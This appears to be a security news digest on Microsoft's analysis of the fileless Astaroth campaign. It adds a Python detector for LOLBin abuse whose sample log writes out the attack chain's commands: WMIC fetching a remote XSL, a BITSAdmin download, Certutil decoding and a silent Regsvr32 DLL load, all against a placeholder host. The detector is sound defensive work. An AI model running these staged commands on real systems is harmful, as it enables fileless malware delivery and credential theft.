Threat Watch

Great Duke of Hell Windows Malware Confirmed by Microsoft ATP Research Team

The Microsoft Defender ATP Research Team has confirmed a campaign spreading Astaroth, a credential-stealing backdoor that targets Windows users. The malware relies on an "invisible man" tactic to evade detection: every stage of the attack chain is executed by a legitimate, signed system tool, so no custom executable ever has to be written to disk. The backdoor itself can log keystrokes, monitor the clipboard and harvest login credentials, but what makes it notable is how completely it relies on living-off-the-land binaries (LOLBins). In the campaign Microsoft analysed, the final payload is delivered through the Windows Management Instrumentation Command-line tool (WMIC), the BITSAdmin command-line tool, the Certutil certificate services command-line tool, the Regsvr32 command-line utility and the Userinit system process.

The chain still depends on a user opening a spear-phishing email and following a link to a malicious ZIP archive, which typically carries an LNK shortcut. From there the process is deliberately obscure: the shortcut runs a BAT command line, which launches WMIC with a /format argument pointing at a remote, obfuscated XSL file; the script embedded in that XSL runs WMIC a second time to fetch a second XSL. That stage uses BITSAdmin to download further Base64-encoded payloads, which are decoded with Certutil. One of the decoded payloads is a DLL that is loaded by passing it to Regsvr32, and the chain ends with the Astaroth payload injected into the Userinit process. This is unlikely to be the last Astaroth campaign, as fileless techniques of this kind are becoming more popular with attackers.
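Because every stage above runs inside a signed Microsoft binary, file-based antivirus has little to hook on; the practical defence is to watch the command lines those binaries are invoked with. The following detector is an added example written for this digest (it is not code from Microsoft's research or from the Astaroth analysis) and scans process-creation events for the documented abuse patterns: WMIC fetching a remote stylesheet with /format, BITSAdmin used as a downloader, Certutil decoding a Base64 blob, and Regsvr32 silently loading a DLL. The `key=value|key=value` log format, the field names and the sample events are constructed for illustration and do not correspond to any real EDR export or to the actual campaign's URLs or file names.

```python
"""Added example: flag LOLBin command lines of the kind the Astaroth chain abuses.

The log format (ts=...|image=...|parent=...|cmd=...) and the sample events are
constructed for illustration; they are not real telemetry from the campaign.
"""
import re
from typing import Callable, Dict, List, Tuple

Event = Dict[str, str]


def _cmd(event: Event) -> str:
    """Lower-cased command line of an event (empty string if absent)."""
    return event.get("cmd", "").lower()


# Detection rules: (rule name, executable basename, predicate on the event).
# Each predicate encodes a publicly documented abuse of that binary.
RULES: List[Tuple[str, str, Callable[[Event], bool]]] = [
    # WMIC told to format its output with a stylesheet fetched from a URL;
    # the XSL can carry script that WMIC executes.
    ("wmic_remote_format", "wmic.exe",
     lambda e: re.search(r'/format\s*:\s*"?https?://', _cmd(e)) is not None),
    # BITSAdmin used as a file downloader.
    ("bitsadmin_transfer", "bitsadmin.exe",
     lambda e: "/transfer" in _cmd(e)),
    # Certutil decoding a Base64 blob already on disk (or fetching with -urlcache).
    ("certutil_decode", "certutil.exe",
     lambda e: "-decode" in _cmd(e) or "-urlcache" in _cmd(e)),
    # Regsvr32 loading a DLL silently (/s) or via a scriptlet (/i:).
    ("regsvr32_silent_dll", "regsvr32.exe",
     lambda e: ".dll" in _cmd(e)
     and (re.search(r"(^|\s)/s\b", _cmd(e)) is not None or "/i:" in _cmd(e))),
]


def parse_event(line: str) -> Event:
    """Parse one 'key=value|key=value' line (constructed format) into a dict."""
    event: Event = {}
    for field in line.strip().split("|"):
        key, _, value = field.partition("=")
        event[key.strip()] = value.strip()
    return event


def image_basename(event: Event) -> str:
    """Lower-cased file name of the launched image, without its directory."""
    path = event.get("image", "").replace("/", "\\")
    return path.rsplit("\\", 1)[-1].lower()


def match_rules(event: Event) -> List[str]:
    """Names of all rules whose binary and command-line predicate match."""
    name = image_basename(event)
    return [rule for rule, image, pred in RULES if image == name and pred(event)]


def scan_log(log: str) -> List[Event]:
    """Return one hit per (event, rule) pair found in the log text."""
    hits: List[Event] = []
    for line in log.strip().splitlines():
        if not line.strip():
            continue
        event = parse_event(line)
        for rule in match_rules(event):
            hits.append({"ts": event.get("ts", ""), "rule": rule,
                         "parent": event.get("parent", ""), "cmd": event.get("cmd", "")})
    return hits


def lolbin_chain_detected(hits: List[Event], min_distinct: int = 3) -> bool:
    """True when several *different* LOLBin abuses fire together.

    Any single rule has benign hits (admins do run certutil and wmic), but three
    or more distinct ones in one session look like the staged download, decode
    and load chain. In production, correlate per host and time window rather
    than over a whole file as done here.
    """
    return len({h["rule"] for h in hits}) >= min_distinct


# Constructed sample telemetry: the first five events mimic the staged chain,
# the last two are ordinary administrative use that must not fire.
SAMPLE_LOG = r"""
ts=2019-07-01T10:00:01|image=C:\Windows\System32\cmd.exe|parent=explorer.exe|cmd=cmd.exe /c setup.bat
ts=2019-07-01T10:00:02|image=C:\Windows\System32\wbem\WMIC.exe|parent=cmd.exe|cmd=wmic os get /format:"https://example.invalid/v.xsl"
ts=2019-07-01T10:00:05|image=C:\Windows\System32\bitsadmin.exe|parent=wmic.exe|cmd=bitsadmin /transfer job /download /priority high https://example.invalid/p1.txt C:\Users\Public\p1.txt
ts=2019-07-01T10:00:07|image=C:\Windows\System32\certutil.exe|parent=wmic.exe|cmd=certutil -decode C:\Users\Public\p1.txt C:\Users\Public\p1.dll
ts=2019-07-01T10:00:08|image=C:\Windows\System32\regsvr32.exe|parent=wmic.exe|cmd=regsvr32 /s C:\Users\Public\p1.dll
ts=2019-07-01T11:30:00|image=C:\Windows\System32\certutil.exe|parent=cmd.exe|cmd=certutil -hashfile C:\tmp\installer.msi SHA256
ts=2019-07-01T11:31:00|image=C:\Windows\System32\wbem\WMIC.exe|parent=cmd.exe|cmd=wmic os get caption
"""

if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for hit in found:
        print(f"{hit['ts']} {hit['rule']:<22} parent={hit['parent']:<12} {hit['cmd']}")
    print("LOLBin chain detected:", lolbin_chain_detected(found))
```

Run as-is, the four chain events fire one rule each while the two benign `certutil -hashfile` and `wmic os get caption` lines stay quiet; the chain verdict comes from the number of distinct rules, which is what separates a staged attack from an administrator who happened to use one of these tools.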


Microsoft recommends that Windows users run Windows Defender Antivirus, which catches this chain by monitoring the behaviour of the abused system tools rather than by scanning for a malicious file. Users who choose not to run it should be extremely cautious with email from unknown senders that carries or links to .lnk or .zip files.